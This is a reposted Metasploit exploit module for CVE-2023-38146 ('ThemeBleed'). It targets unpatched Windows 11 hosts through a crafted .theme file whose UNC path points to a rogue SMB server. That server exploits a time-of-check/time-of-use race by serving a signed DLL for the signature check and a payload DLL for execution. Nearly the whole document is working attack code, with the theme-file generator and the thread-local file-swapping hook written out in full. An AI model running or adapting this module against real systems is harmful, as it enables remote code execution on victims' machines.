Themebleed Windows 11 Themes Arbitrary Code Execution
2024-1-5 22:32:50 Author: packetstormsecurity.com(查看原文) 阅读量:5 收藏

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::FILEFORMAT
include Msf::Exploit::EXE
include Msf::Exploit::Remote::SMB::Server::Share

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Themebleed- Windows 11 Themes Arbitrary Code Execution CVE-2023-38146',
'Description' => %q{
When an unpatched Windows 11 host loads a theme file referencing an msstyles file, Windows loads the
msstyles file, and if that file's PACKME_VERSION is `999`, it then attempts to load an accompanying dll
file ending in `_vrf.dll` Before loading that file, it verifies that the file is signed. It does this by
opening the file for reading and verifying the signature before opening the file for execution.
Because this action is performed in two discrete operations, it opens the procedure for a time of check to
time of use vulnerability. By embedding a UNC file path to an SMB server we control, the SMB server can
serve a legitimate, signed dll when queried for the read, but then serve a different file of the same name
when the host intends to load/execute the dll.
},
'DisclosureDate' => '2023-09-13',
'Author' => [
'gabe_k', # Discovery/PoC
'bwatters-r7', # msf exploit
'Spencer McIntyre' # msf exploit
],
'References' => [
['CVE', '2023-38146'],
['URL', 'https://exploits.forsale/themebleed/'],
['URL', 'https://github.com/gabe-k/themebleed/tree/main']

],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X64,
'Targets' => [
[ 'Windows', {} ],
],
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS],
'AKA' => ['ThemeBleed']

},
'DefaultOptions' => { 'DisablePayloadHandler' => false }
)
)

register_options([
OptPath.new('STYLE_FILE', [ true, 'The Microsoft-signed .msstyles file (e.g. aero.msstyles).', '' ], regex: /.*\w*\.msstyles$/),
OptString.new('STYLE_FILE_NAME', [ true, 'The name of the style file to reference.', '' ], regex: /^\w*(\.msstyles)?$/),
OptString.new('THEME_FILE_NAME', [ true, 'The name of the theme file to generate.', 'exploit.theme' ])
])

deregister_options(
'FILENAME', # this is the one used by the FILEFORMAT mixin, replaced by THEME_FILE_NAME for clarity
'FILE_NAME', # this is the one used by the SMB::Server::Share mixin, replaced by STYLE_FILE_NAME for clarity
'FOLDER_NAME'
)
end

def file_format_filename
datastore['THEME_FILE_NAME']
end

def setup
super

@file = File.binread(datastore['STYLE_FILE'])
begin
pe = Rex::PeParsey::Pe.new_from_string(@file)
rescue Rex::PeParsey::PeError => e
fail_with(Failure::BadConfig, "Failed to parse the STYLE_FILE: #{e}")
end

unless pe.resources && (rva = pe.resources['/PACKTHEM_VERSION/0/0']&.rva)
fail_with(Failure::BadConfig, 'The STYLE_FILE has no PACKTHEM_VERSION resource.')
end
@file_version_offset = pe.rva_to_file_offset(rva)

@file_name = datastore['STYLE_FILE_NAME'].blank? ? Rex::Text.rand_text_alpha(rand(4..6)) : datastore['STYLE_FILE_NAME']
@file_name << '.msstyles' unless @file_name.end_with?('.msstyles')
end

def primer
payload_dll = generate_payload_dll
max_length = [payload_dll.length, @file.length].max
# make sure that the lengths are the same by padding the smaller to the length of the larger
@file.ljust(max_length, "\x00".b)
payload_dll.ljust(max_length, "\x00".b)

virtual_disk = service.shares[@share]
@service = service

virtual_file = ThreadLocalVirtualStaticFile.new(virtual_disk, "/#{@file_name}_vrf.dll", @file)
virtual_disk.add(virtual_file)
# install this hook for create requests to set the thread-local file content
virtual_disk.add_hook(RubySMB::SMB2::Packet::CreateRequest) do |_session, request|
next unless request.name.read_now!.encode.ends_with?('_vrf.dll')

if request.desired_access.execute == 1
virtual_file.tl_content = payload_dll
else
virtual_file.tl_content = @file
end

nil
end

file_create(make_theme)
end

def get_file_contents(client:)
print_status("Sending file to #{client.peerhost}")
new_version = [999].pack('v')
@file[0...@file_version_offset] + new_version + @file[(@file_version_offset + new_version.length)...]
end

def make_theme
<<~THEME
[Theme]
DisplayName=@%SystemRoot%\\System32\\themeui.dll,-2060

[Control Panel\\Desktop]
Wallpaper=%SystemRoot%\\web\\wallpaper\\Windows\\img0.jpg
TileWallpaper=0
WallpaperStyle=10

[VisualStyles]
Path=\\\\#{datastore['SRVHOST']}\\#{@share}\\#{@file_name}
ColorStyle=NormalColor
Size=NormalSize

[MasterThemeSelector]
MTSM=RJSPBS
THEME
end

class ThreadLocalVirtualStaticFile < RubySMB::Server::Share::Provider::VirtualDisk::VirtualStaticFile
def initialize(*args, **kwargs)
super
@default_content = @content
@tl_content = {}
@tl_content.compare_by_identity
end

def open(mode = 'r', &block)
@content = tl_content
super
end

def tl_content=(content)
@tl_content[Thread.current] = content
end

def tl_content
@tl_content.fetch(Thread.current, @default_content)
end
end
end


文章来源: https://packetstormsecurity.com/files/176391/theme_dll_hijack_cve_2023_38146.rb.txt
如有侵权请联系:admin#unsafe.sh